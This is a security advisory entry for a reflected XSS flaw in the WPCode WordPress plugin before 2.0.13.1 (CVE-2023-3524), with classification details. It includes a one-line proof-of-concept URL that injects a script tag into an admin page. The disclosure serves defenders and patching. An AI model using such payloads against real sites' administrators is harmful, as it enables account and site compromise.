WordPress Plugin Vulnerabilities

WPCode < 2.0.13.1 - Reflected XSS

Description

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open

https://example.com/wp-admin/admin.php?page=wpcode&a"><script>alert(/XSS/)</script>=2

Affects Plugins

Plugin icon
insert-headers-and-footers
Fixed in 2.0.13.1

References

CVE
CVE-2023-3524

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
89570379-769b-4684-b8a7-28c37b408e5d

Timeline

Publicly Published
2023-07-17 (about 10 months ago)
Added
2023-07-17 (about 10 months ago)
Last Updated
2023-07-17 (about 10 months ago)

Other

Published
Title
Published
2017-10-17
Title
Max Mega Menu < 2.4 - Authenticated XSS
Published
2023-05-04
Title
Cart Lift < 3.1.6 - Reflected XSS
Published
2021-03-03
Title
Advanced Order Export For WooCommerce < 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2016-11-19
Title
Instagram Feed < 1.4.7 - Authenticated Cross-Site Scripting (XSS) & CSRF
Published
2023-01-16
Title
Contextual Related Posts < 3.3.1 - Contributor+ Stored XSS